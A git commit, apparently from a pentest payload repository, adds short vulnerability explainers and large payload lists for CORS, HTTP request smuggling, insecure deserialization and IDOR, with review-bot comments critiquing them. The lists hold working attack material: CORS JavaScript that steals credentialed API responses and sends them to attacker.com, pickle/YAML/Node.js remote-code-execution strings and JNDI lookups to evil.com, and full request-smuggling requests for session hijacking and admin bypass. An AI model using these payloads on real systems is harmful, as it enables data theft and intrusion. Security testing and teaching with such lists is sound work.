Add comprehensive payloads and 4 new vulnerability types (SSTI, HTTP Request Smuggling, CORS, JWT)

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-05 14:50:15 +00:00
parent f2209e214f
commit 68b76036df
13 changed files with 2368 additions and 0 deletions
+35
@@ -0,0 +1,35 @@
# CORS Misconfiguration
## Description
Cross-Origin Resource Sharing (CORS) misconfiguration occurs when a web application incorrectly configures the CORS headers, allowing unauthorized domains to access sensitive resources. This can lead to data theft, account compromise, and bypassing of the Same-Origin Policy.
## Common Misconfigurations
- **Wildcard Origin with Credentials** - `Access-Control-Allow-Origin: *` with `Access-Control-Allow-Credentials: true`
- **Null Origin Allowed** - Accepting `Origin: null`
- **Reflected Origin** - Reflecting any origin without validation
- **Subdomain Trust** - Trusting all subdomains including attacker-controlled ones
- **Pre-domain/Post-domain Trust** - Weak regex matching for origins
## Impact
- Steal sensitive user data
- Perform actions on behalf of users
- Access private API endpoints
- Read authentication tokens
- Bypass CSRF protections
## Common Attack Vectors
- API endpoints with sensitive data
- Authentication endpoints
- Profile information endpoints
- Admin panels
- Internal APIs exposed via CORS
## Testing Approach
1. Send requests with various `Origin` headers
2. Check if `Access-Control-Allow-Origin` reflects the attacker's origin
3. Verify if `Access-Control-Allow-Credentials: true` is set
4. Test with null origin, subdomains, and similar domains
5. Check for weak regex patterns in origin validation
## Payloads
See `cors-misconfiguration-payloads.txt` for a comprehensive list of CORS misconfiguration test payloads.
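Review bot: the first bullet under "Common Misconfigurations" (`Access-Control-Allow-Origin: *` together with `Access-Control-Allow-Credentials: true`) describes a combination browsers refuse to honour: under the Fetch standard a credentialed response whose `Access-Control-Allow-Origin` is the literal `*` fails the CORS check, so it is a configuration mistake but not a data-exposure case. The exploitable shape is the "Reflected Origin" bullet with credentials enabled; suggest rewording the first bullet to make that distinction or folding it into the third. The file also has Impact and Testing Approach sections but no defensive counterpart; a `## Mitigation` list would round it out: exact-match origin allowlist, never echo the request `Origin` back, reject `null`, never combine `Access-Control-Allow-Credentials: true` with a wildcard or reflected origin, and send `Vary: Origin` so a shared cache does not serve one origin's response to another.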
@@ -0,0 +1,276 @@
# CORS Misconfiguration Payloads
# Basic Origin testing
Origin: https://evil.com
Origin: http://evil.com
Origin: https://attacker.com
Origin: http://attacker.com
# Null Origin (works in sandboxed iframes)
Origin: null
# Subdomain variations
Origin: https://evil.target.com
Origin: https://target.com.evil.com
Origin: https://subtarget.com
Origin: https://admin.target.com
Origin: https://api.target.com
# Pre-domain bypass
Origin: https://target.com.evil.com
Origin: https://wwwtarget.com
Origin: https://not-target.com
Origin: https://target.com-evil.com
Origin: https://target.com.attacker.com
# Post-domain bypass
Origin: https://evil.target.com
Origin: https://evil-target.com
Origin: https://eviltarget.com
# Protocol variations
Origin: http://target.com
Origin: https://target.com
Origin: ftp://target.com
Origin: file://target.com
# Port variations
Origin: https://target.com:8080
Origin: https://target.com:8443
Origin: https://target.com:443
Origin: https://target.com:80
# Case sensitivity bypass
Origin: https://TARGET.COM
Origin: https://Target.Com
Origin: https://TaRgEt.CoM
# Underscore in subdomain
Origin: https://evil_admin.target.com
Origin: https://admin_.target.com
# Special characters
Origin: https://target.com%0d%0aEvil: header
Origin: https://target.com%00.evil.com
Origin: https://target.com@evil.com
Origin: https://evil@target.com
# Regex bypass patterns
Origin: https://target.com.evil.com
Origin: https://evil.target.com.net
Origin: https://atarget.com
Origin: https://target.com.de
Origin: https://target.co.uk
Origin: https://target.org
# Localhost variations
Origin: http://localhost
Origin: http://127.0.0.1
Origin: http://0.0.0.0
Origin: http://[::1]
Origin: http://localhost.target.com
# File protocol
Origin: file://
Origin: file:///etc/passwd
# Wildcard subdomain bypass
Origin: https://anything.target.com
Origin: https://xyz123.target.com
Origin: https://hacker.target.com
# Pre-flight request headers
Access-Control-Request-Method: POST
Access-Control-Request-Method: PUT
Access-Control-Request-Method: DELETE
Access-Control-Request-Method: PATCH
Access-Control-Request-Headers: X-Custom-Header
Access-Control-Request-Headers: Authorization
Access-Control-Request-Headers: Content-Type
# Data exfiltration payload (JavaScript)
# For use when CORS is misconfigured
var req = new XMLHttpRequest();
req.open('GET', 'https://target.com/api/user/data', true);
req.withCredentials = true;
req.onload = function() {
fetch('https://attacker.com/steal?data=' + btoa(req.responseText));
};
req.send();
# Fetch API exploitation
fetch('https://target.com/api/sensitive', {
credentials: 'include'
}).then(r => r.text()).then(data => {
fetch('https://attacker.com/log?data=' + btoa(data));
});
# Testing for credential exposure
GET /api/user HTTP/1.1
Host: target.com
Origin: https://evil.com
Cookie: session=abc123
# WebSocket CORS bypass
var ws = new WebSocket('wss://target.com/socket');
ws.onmessage = function(event) {
fetch('https://attacker.com/log?data=' + btoa(event.data));
};
# Multiple Origin headers
Origin: https://target.com
Origin: https://evil.com
# Origin with credentials
Origin: https://user:pass@target.com
Origin: https://admin@target.com
# Homograph attacks (IDN)
Origin: https://tаrget.com # Cyrillic 'а'
Origin: https://tаrgеt.com # Cyrillic 'а' and 'е'
Origin: https://targеt.com # Cyrillic 'е'
# Bypass via special TLDs
Origin: https://target.com.local
Origin: https://target.com.internal
Origin: https://target.com.corp
# IPv6 localhost variations
Origin: http://[::1]
Origin: http://[0:0:0:0:0:0:0:1]
Origin: http://[0:0:0:0:0:0:0:0]
Origin: http://[::ffff:127.0.0.1]
# Private IP ranges
Origin: http://192.168.1.1
Origin: http://10.0.0.1
Origin: http://172.16.0.1
Origin: http://169.254.169.254
# CORS with reflected subdomains
Origin: https://xss.target.com
Origin: https://<script>.target.com
Origin: https://javascript:alert(1).target.com
# Bypass with URL encoding
Origin: https://%74%61%72%67%65%74.com
Origin: https://target%2ecom
# Double encoding
Origin: https://%2574%2561%2572%2567%2565%2574.com
# Unicode bypass
Origin: https://ⓣⓐⓡⓖⓔⓣ.com
Origin: https://𝓽𝓪𝓻𝓰𝓮𝓽.com
# Testing Access-Control-Allow-Methods
GET /api/admin HTTP/1.1
Host: target.com
Origin: https://evil.com
Access-Control-Request-Method: DELETE
# Testing Access-Control-Allow-Headers
GET /api/user HTTP/1.1
Host: target.com
Origin: https://evil.com
Access-Control-Request-Headers: X-Admin-Token
# Cache poisoning via CORS
GET /api/data HTTP/1.1
Host: target.com
Origin: https://evil.com
X-Forwarded-Host: evil.com
# CORS with authentication bypass
GET /api/sensitive HTTP/1.1
Host: target.com
Origin: https://evil.com
Cookie: session=victim_session_token
# Testing weak regex patterns
Origin: https://target.com.example.com
Origin: https://example.target.com.example.com
Origin: https://target_com.example.com
Origin: https://target-com.example.com
# Path traversal in Origin
Origin: https://target.com/../../evil.com
Origin: https://target.com/../evil.com
# Fragment identifier bypass
Origin: https://target.com#evil.com
Origin: https://target.com#@evil.com
# Query string in Origin (invalid but test anyway)
Origin: https://target.com?evil.com
Origin: https://target.com?redirect=evil.com
# Bypassing with trailing characters
Origin: https://target.com/
Origin: https://target.com\
Origin: https://target.com;
Origin: https://target.com,
# Mixed content bypass
Origin: http://target.com (when site uses HTTPS)
Origin: https://target.com (when site uses HTTP)
# Testing with data URI
Origin: data:text/html,<script>alert(1)</script>
# Testing with javascript URI
Origin: javascript:alert(1)
# Origin with username
Origin: https://admin:password@target.com
# Testing with blob URI
Origin: blob:https://target.com/uuid
# Custom protocol
Origin: custom://target.com
Origin: app://target.com
# Testing max-age for preflight
Access-Control-Max-Age: 86400
# Wildcard with specific paths
Origin: https://evil.com/api/public
# Testing exposed headers
Access-Control-Expose-Headers: Authorization, X-API-Key
# CORS on error pages
GET /404 HTTP/1.1
Host: target.com
Origin: https://evil.com
# CORS on redirect
GET /redirect HTTP/1.1
Host: target.com
Origin: https://evil.com
# Exploiting wildcard subdomains
Origin: https://attacker-controlled.target.com
Origin: https://s3bucket.target.com
Origin: https://malicious.pages.target.com
# Testing JSONP with CORS
GET /api/data?callback=alert HTTP/1.1
Host: target.com
Origin: https://evil.com
# WebRTC CORS bypass
var pc = new RTCPeerConnection();
pc.createDataChannel('');
pc.createOffer().then(offer => pc.setLocalDescription(offer));
# Service Worker CORS
self.addEventListener('fetch', event => {
event.respondWith(
fetch(event.request.url, {
mode: 'cors',
credentials: 'include'
})
);
});
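Review bot: the file mixes three kinds of content under one `#` comment convention, which breaks any consumer that reads it as one `Origin` value per line: bare header values, raw multi-line HTTP requests ("Testing for credential exposure" onward), and JavaScript snippets ("Data exfiltration payload", "Fetch API exploitation", "WebSocket CORS bypass", "WebRTC CORS bypass", "Service Worker CORS"). Suggest keeping only header values here and moving the requests and scripts to a separate file or into the markdown doc. Two of the script blocks are also mislabelled: the WebRTC snippet performs no cross-origin request at all (it only creates a data channel and an offer), and a service worker is bound to its own origin, so a `fetch` with `mode: 'cors'` inside it is subject to the same CORS checks as page script; neither is a "CORS bypass". Minor: several values repeat (`https://evil.target.com`, `https://target.com.evil.com` and `http://[::1]` each appear more than once), and the two "Mixed content bypass" lines carry a parenthetical note inside the header value, which a replayer would send verbatim; put the note on a `#` line instead.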
@@ -53,3 +53,163 @@ Spring2
# Ruby Marshal
\x04\x08o:\x10User\x06:\x0arole:\x0aadmin
# Advanced Java gadget chains
# Apache Commons Collections
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors.InvokerTransformer
org.apache.commons.collections.functors.ChainedTransformer
org.apache.commons.collections.functors.ConstantTransformer
org.apache.commons.collections.keyvalue.TiedMapEntry
org.apache.commons.collections.map.LazyMap
# Spring Framework
org.springframework.context.support.ClassPathXmlApplicationContext
org.springframework.beans.factory.config.PropertyPathFactoryBean
# C3P0
com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase
com.mchange.v2.c3p0.JndiRefForwardingDataSource
# Hibernate
org.hibernate.engine.spi.TypedValue
org.hibernate.tuple.component.AbstractComponentTuplizer
# Vaadin
com.vaadin.data.util.NestedMethodProperty
com.vaadin.data.util.PropertysetItem
# Advanced PHP serialization
O:8:"stdClass":1:{s:4:"code";s:10:"phpinfo();";}
O:11:"PDOStatement":0:{}
a:2:{i:0;O:8:"stdClass":0:{}i:1;s:5:"admin";}
O:12:"SplFileObject":1:{s:0:"";s:11:"/etc/passwd";}
# PHP object injection with magic methods
O:10:"Evil_Class":1:{s:8:"filename";s:11:"/etc/passwd";}
O:4:"User":2:{s:2:"id";i:1;s:4:"role";s:5:"admin";}
O:7:"PhpCode":1:{s:4:"code";s:6:"system";}
# Advanced Python pickle
\x80\x03csubprocess\ncheck_output\n(S'ls'\ntR.
\x80\x03csubprocess\nPopen\n(S'calc'\ntR.
\x80\x03cos\nsystem\n(S'whoami'\ntR.
cos\nsystem\n(S'cat /etc/passwd'\ntR.
# Python pickle RCE variants
c__builtin__\neval\n(S'__import__("os").system("ls")'\ntR.
\x80\x03c__builtin__\nexec\n(S'import os;os.system("whoami")'\ntR.
# .NET BinaryFormatter
AAEAAAD/////AQAAAAAAAAAMAgAAAE1TeXN0ZW0u
AAEAAAD/////AQAAAAAAAAAEAQAAAClT
# .NET ObjectStateFormatter
/wEy
# .NET SoapFormatter
<SOAP-ENV:Envelope
# ViewState exploitation (.NET)
__VIEWSTATE=/wEPDwUKLTY5NDY
__VIEWSTATEGENERATOR=CA0B0334
# JSON deserialization with type confusion
{"$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework"}
{"__type":"System.IO.FileInfo"}
{"@class":"java.net.URL","val":"http://evil.com"}
# Jackson polymorphic deserialization
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:"}]
["org.apache.xbean.propertyeditor.JndiConverter",{"asText":"ldap://evil.com/"}]
["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"ldap://evil.com/","autoCommit":true}]
# Fastjson exploitation
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://evil.com/Exploit","autoCommit":true}
{"@type":"java.net.Inet4Address","val":"evil.com"}
{"@type":"java.net.URL","val":"http://evil.com"}
# YAML deserialization (Python)
!!python/object/apply:subprocess.Popen [['calc']]
!!python/object/new:os.system [calc]
!!python/object/apply:os.system ['whoami']
# YAML deserialization (Ruby)
--- !ruby/object:Gem::Installer
i: x
--- !ruby/object:Gem::Requirement
requirements: !ruby/object:Gem::Package::TarReader
# Node.js prototype pollution
{"__proto__":{"isAdmin":true}}
{"constructor":{"prototype":{"isAdmin":true}}}
{"__proto__":{"shell":"/bin/sh"}}
# Node.js VM escape
{"rce":"_$$ND_FUNC$$_function(){return require('child_process').execSync('whoami').toString()}()"}
{"eval":"_$$ND_FUNC$$_function(){return global.process.mainModule.require('child_process').execSync('id').toString()}()"}
# Ruby YAML deserialization
--- !ruby/object:Gem::Installer\ni: x\n--- !ruby/object:Gem::SpecFetcher\ni: y
!ruby/object:Gem::Requirement {requirements: [[!, !ruby/object:Gem::Package::TarReader {}}]}
# Java RMI exploitation
rmi://evil.com:1099/Object
rmi://127.0.0.1:1099/Exploit
# JNDI injection patterns
ldap://evil.com/Exploit
ldaps://evil.com/Exploit
rmi://evil.com/Exploit
dns://evil.com/Exploit
iiop://evil.com/Exploit
corba://evil.com/Exploit
# Java gadget chain references
ysoserial.payloads.CommonsCollections1
ysoserial.payloads.CommonsCollections2
ysoserial.payloads.CommonsCollections3
ysoserial.payloads.CommonsCollections4
ysoserial.payloads.CommonsCollections5
ysoserial.payloads.CommonsCollections6
ysoserial.payloads.CommonsCollections7
ysoserial.payloads.Groovy1
ysoserial.payloads.Spring1
ysoserial.payloads.Spring2
ysoserial.payloads.ROME
ysoserial.payloads.JDK7u21
ysoserial.payloads.Jython1
ysoserial.payloads.Click1
ysoserial.payloads.Wicket1
# Base64 encoded Java serialized objects
rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ==
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAU=
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldABA
# PHP Phar deserialization
phar://exploit.phar/test.txt
phar://./exploit.phar
phar://exploit.jpg/test.txt
# AMF (Action Message Format)
\x00\x03\x00\x00\x00\x01
# MessagePack
\x81\xa4eval\xa6system
# Pickle bytecode patterns
c__builtin__\ngetattr\n
c__builtin__\n__import__\n
cos\nsystem\n
csubprocess\ncall\n
csubprocess\ncheck_output\n
# Serialization headers detection
\xac\xed\x00\x05 # Java serialization
O: # PHP serialization
\x80\x03 # Python pickle protocol 3
\x80\x04 # Python pickle protocol 4
\x04\x08 # Ruby Marshal
AAEAAAD # .NET BinaryFormatter
/wE # .NET ObjectStateFormatter
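Review bot: the "Ruby YAML deserialization" block near the end duplicates the earlier "YAML deserialization (Ruby)" section, and its second line is not valid YAML (the brackets in `{requirements: [[!, !ruby/object:Gem::Package::TarReader {}}]}` do not balance and a bare `!` is not a tag), so either drop the block or keep only the well-formed multi-line form already used above. The length prefixes on the `PDOStatement` and `SplFileObject` entries under "Advanced PHP serialization" do not match the class names, so `unserialize()` rejects those lines as written. The "Serialization headers detection" section at the end is the defensively useful part of this file (magic bytes a WAF rule or log search can key on) and deserves its own detection note; as it stands the trailing `# ...` comments share the line with the pattern, so a line-oriented consumer would treat `\xac\xed\x00\x05 # Java serialization` as a single pattern.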
+41
@@ -0,0 +1,41 @@
# HTTP Request Smuggling
## Description
HTTP Request Smuggling occurs when the front-end and back-end servers disagree about where one request ends and the next begins. This vulnerability allows attackers to bypass security controls, gain unauthorized access, and poison web caches.
## Vulnerability Types
- **CL.TE** - Content-Length vs Transfer-Encoding
- **TE.CL** - Transfer-Encoding vs Content-Length
- **TE.TE** - Transfer-Encoding obfuscation
- **CL.CL** - Duplicate Content-Length headers
## Common Attack Vectors
- Front-end/Back-end server desynchronization
- Load balancer misconfigurations
- Reverse proxy issues
- CDN edge servers
- WAF bypass
## Impact
- Bypass security controls
- Web cache poisoning
- Cross-site scripting
- Request hijacking
- Credential theft
- Access other users' requests
## Testing Approach
1. Send requests with conflicting Content-Length and Transfer-Encoding headers
2. Observe timing differences and response variations
3. Test with different header obfuscation techniques
4. Verify if smuggled requests affect subsequent requests
## Common Vulnerable Configurations
- HAProxy + Apache
- Nginx + Apache
- AWS ALB + various backends
- Akamai + various backends
- Cloudflare + various backends
## Payloads
See `http-request-smuggling-payloads.txt` for a comprehensive list of HTTP Request Smuggling payloads.
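Review bot: the "Common Vulnerable Configurations" list names vendor products and pairings (HAProxy + Apache, Nginx + Apache, AWS ALB, Akamai, Cloudflare) as vulnerable with no version, date or reference, which reads as a current claim against those products; desync issues in such pairings were reported and fixed at specific versions, so either cite the write-up and affected versions for each or retitle the section to something like "Pairings where desync has been reported". The doc also has Impact and Testing Approach sections but no mitigation; suggest a `## Mitigation` list with the standard defences: use HTTP/2 end-to-end (or at least avoid downgrading to HTTP/1.1 at the back end), have the front end reject any request carrying both `Content-Length` and `Transfer-Encoding` or a malformed `Transfer-Encoding` rather than normalising it, and close the back-end connection whenever a request is rejected so nothing is left in the stream for the next user. Minor: "CL.CL" is not one of the standard CL.TE/TE.CL/TE.TE categories; note that RFC 7230 section 3.3.3 requires a message with differing `Content-Length` values to be treated as an unrecoverable framing error, which is the check a front end should apply.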
@@ -0,0 +1,526 @@
# HTTP Request Smuggling Payloads
# CL.TE (Content-Length vs Transfer-Encoding)
# Front-end uses Content-Length, back-end uses Transfer-Encoding
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 6
Transfer-Encoding: chunked
0
G
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
# TE.CL (Transfer-Encoding vs Content-Length)
# Front-end uses Transfer-Encoding, back-end uses Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
5e
POST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
0
---
# TE.TE (Transfer-Encoding obfuscation)
# Both servers handle Transfer-Encoding but one can be obfuscated
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: x
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
# Transfer-Encoding obfuscation variants
Transfer-Encoding: chunked
Transfer-Encoding: xchunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding: chunked
Transfer-encoding: chunked
Transfer-Encoding: chunked
Transfer-Encoding: chunked;
Transfer-Encoding: chunked,
Transfer-Encoding: identity
Transfer-Encoding: identity, chunked
Transfer-Encoding: chunked, identity
Transfer-Encoding: chunked
Transfer-Encoding: identity
Transfer-Encoding: chunked
Transfer-Encoding : chunked
Transfer-Encoding:chunked
Transfer-Encoding:
chunked
Transfer-Encoding:
chunked
[space]Transfer-Encoding: chunked
Transfer-Encoding[space]: chunked
Transfer-Encoding:[space]chunked
Transfer-Encoding: chu nked
Transfer-Encoding: chunk ed
Transfer-Encoding: chun\x0bked
# CL.CL (Duplicate Content-Length)
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 8
Content-Length: 7
12345
SMUGGLED
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 8
Content-Length: 9
test=1
SMUGGLED
---
# Cache poisoning via request smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 130
Transfer-Encoding: chunked
0
GET /static/script.js HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Bypassing front-end security controls
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Length: 100
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For: 127.0.0.1
Content-Length: 10
x=
---
# Capturing other users' requests
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 230
Transfer-Encoding: chunked
0
POST /log HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 1000
comment=
---
# XSS via request smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GET /search?q=<script>alert(1)</script> HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Web cache deception
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 180
Transfer-Encoding: chunked
0
GET /static/include.js HTTP/1.1
Host: vulnerable-website.com
X-Ignore: X
GET /account HTTP/1.1
Host: vulnerable-website.com
---
# Exploiting different chunk handling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
96
POST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
csrf=token&action=delete
0
---
# Timing-based detection payload
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
1
Z
Q
---
# Header injection for smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 200
Transfer-Encoding: chunked
0
GET / HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: evil.com
Content-Length: 10
x=
---
# Session hijacking
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 250
Transfer-Encoding: chunked
0
POST /account/update HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
email=attacker@evil.com&session=
---
# Smuggling with newlines
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding:
chunked
Content-Length: 4
5c
SMUGGLED
0
---
# Smuggling with tabs
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4
5c
SMUGGLED
0
---
# HTTP/2 downgrade smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4
0
SMUGGLED
---
# Chunk size obfuscation
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
0000000000000000000a
SMUGGLED123
0
---
# Negative Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: -1
Transfer-Encoding: chunked
0
SMUGGLED
---
# Very large Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 999999999
Transfer-Encoding: chunked
0
SMUGGLED
---
# Mixed line endings
POST / HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
Content-Length: 4\r\n
Transfer-Encoding: chunked\n
\r\n
5c\r\n
SMUGGLED\r\n
0\r\n
\r\n
---
# Unicode in headers
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
TransferEncoding: identity
0
SMUGGLED
---
# Multiple Host headers
POST / HTTP/1.1
Host: vulnerable-website.com
Host: evil.com
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
---
# Smuggling to internal endpoints
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GET /internal/admin HTTP/1.1
Host: localhost
X-Forwarded-For: 127.0.0.1
Content-Length: 10
x=
---
# Cookie injection via smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 180
Transfer-Encoding: chunked
0
GET / HTTP/1.1
Host: vulnerable-website.com
Cookie: session=stolen_session_here
Content-Length: 10
x=
---
# Authorization bypass
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 200
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: vulnerable-website.com
Authorization: Bearer admin_token_here
Content-Length: 10
x=
---
# CRLF injection in chunks
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
0\r\n
\r\n
GET /admin HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
\r\n
---
# Smuggling via Content-Type
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
---
# Request line injection
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GPOST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Protocol smuggling (HTTP/1.1 -> HTTP/2)
POST / HTTP/1.1
Host: vulnerable-website.com
Upgrade: h2c
Connection: Upgrade, HTTP2-Settings
HTTP2-Settings: AAMAAABkAAQAAP__
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
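Review bot: the file never states its byte-encoding convention, and the hunk mixes three: literal requests with real line breaks, requests with `\r\n` written out as text ("Mixed line endings", "CRLF injection in chunks"), and placeholders such as `[space]` and `chun\x0bked` in the obfuscation list. A replayer that sends lines verbatim transmits the backslash sequences as ASCII, and the "Smuggling with tabs" request cannot carry a tab in a plain text file at all: as written it is byte-for-byte the basic CL.TE request from the top of the file with a different `Content-Length`, so it tests nothing new. Suggest a header comment fixing one convention (raw bytes here, escaped variants in a separate file) or using the explicit `\r\n` notation throughout. The "HTTP/2 downgrade smuggling" entry has the same problem: it is a plain HTTP/1.1 CL.TE request and shows nothing HTTP/2-specific, since H2.CL/H2.TE desync depends on the front end speaking HTTP/2 and rewriting the request on downgrade. Minor: the "Timing-based detection payload" should say that it is a detection-only probe (a delayed response is the signal), whereas the other entries alter what the back end reads on that connection and so affect other clients sharing it; that distinction is worth stating at the top of the file.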
+177
@@ -38,3 +38,180 @@
# Array/Multiple IDs
?id[]=1&id[]=2
?ids=1,2,3
# HTTP Methods for IDOR
GET /api/user/1
POST /api/user/1
PUT /api/user/1
DELETE /api/user/1
PATCH /api/user/1
# Path-based IDOR
/users/1/profile
/users/2/profile
/users/admin/profile
/api/v1/users/1
/api/v1/users/2
/api/v2/user/1/settings
/api/user/1/private
/api/user/2/documents
# Subdomain enumeration
user1.example.com
user2.example.com
admin.example.com
# GUID/UUID variations
?id=00000000-0000-0000-0000-000000000000
?id=ffffffff-ffff-ffff-ffff-ffffffffffff
?id=12345678-1234-1234-1234-123456789012
?uuid=a1b2c3d4-e5f6-4a5b-8c7d-9e0f1a2b3c4d
# Base64 encoded IDs
?id=MQ==
?id=Mg==
?id=YWRtaW4=
?user=dXNlcjE=
# Hash-based IDs
?id=5f4dcc3b5aa765d61d8327deb882cf99
?id=098f6bcd4621d373cade4e832627b4f6
?token=abc123def456
# Numeric variations
?id=0001
?id=0010
?id=0100
?id=1000
?user_id=00001
?customer_id=00100
# Special characters in IDs
?id=../1
?id=../../2
?id=..%2f1
?id=%2e%2e%2f1
# API endpoint variations
/api/orders/1
/api/orders/2
/api/invoices/1
/api/transactions/1
/api/messages/1
/api/posts/1/edit
/api/comments/1/delete
# Cookie-based IDOR
Cookie: user_id=1
Cookie: user_id=2
Cookie: session_id=user1
Cookie: account=1
# Header-based IDOR
X-User-Id: 1
X-User-Id: 2
X-Account-Id: 1
X-Customer-Id: 2
# JSON body IDOR
{"user_id": 1}
{"user_id": 2}
{"account_id": 1}
{"profile_id": 2}
# Compound IDs
?user_id=1&account_id=1
?id=1&type=admin
?user=1&role=admin
# Email-based enumeration
?email=user1@example.com
?email=user2@example.com
?email=admin@example.com
?email=test@test.com
# Phone number enumeration
?phone=1234567890
?phone=+11234567890
?mobile=9876543210
# Date-based IDs
?date=2024-01-01
?created_at=2024-01-01
?year=2024&month=01&day=01
# Predictable patterns
?ref=INV-001
?ref=INV-002
?order=ORD-1000
?order=ORD-1001
?ticket=TKT-001
# Encoded variations
?id=1%00
?id=1%0a
?id=1%0d
?id=1%20
# Boolean values
?admin=true
?admin=false
?is_admin=1
?is_admin=0
?superuser=true
# Wildcard attempts
?id=*
?user=*
?search=*
# Negative numbers
?id=-1
?id=-10
?id=-100
?offset=-1
# Large numbers
?id=999999999
?id=2147483647
?id=9999999999999
# Float/Decimal
?id=1.0
?id=1.5
?amount=0.01
# SQL-style injection in IDOR
?id=1' OR '1'='1
?id=1 OR 1=1
?id=1 UNION SELECT * FROM users
# NoSQL-style injection in IDOR
?id[$ne]=1
?id[$gt]=0
?user[$regex]=admin
# XML-style
?id=<id>1</id>
?user=<user>admin</user>
# GraphQL IDOR
?query={user(id:1){name,email}}
?query={user(id:2){name,email}}
# REST variations
/users/me
/users/self
/users/current
/users/1
/users/2
# Hyphenated IDs
?id=user-1
?id=account-2
?ref=invoice-001
# Underscore IDs
?id=user_1
?id=account_2
?id=customer_001
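Review bot: several of the added sections are not IDOR tests and belong in the per-technique lists instead: "Special characters in IDs" (`../`, `%2e%2e%2f`) is path traversal, "SQL-style injection in IDOR" and "NoSQL-style injection in IDOR" are injection probes, and "Subdomain enumeration" is reconnaissance. Keeping them here turns an authorisation check (the same request with another user's identifier) into a noisy injection scan and dilutes the file. Minor: the two "Hash-based IDs" values are unlabelled; they are the MD5 digests of `password` and `test`, which is the point worth documenting in a `#` comment (a hashed identifier is only as unpredictable as its input). The "Boolean values" section (`?admin=true`, `?is_admin=1`) is parameter tampering / mass assignment rather than an object-reference test, and its header should say so if it stays.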
+47
@@ -0,0 +1,47 @@
# JWT (JSON Web Token) Vulnerabilities
## Description
JWT vulnerabilities occur when JSON Web Tokens are improperly implemented or validated, allowing attackers to forge tokens, escalate privileges, or bypass authentication mechanisms. JWTs are widely used for authentication and authorization in modern web applications.
## Common Vulnerabilities
- **None Algorithm** - Setting `alg` to `none` to bypass signature verification
- **Algorithm Confusion** - Switching from RS256 to HS256
- **Weak Secret Key** - Using weak or default secrets for HMAC
- **Key Injection** - Injecting public key in JWK header
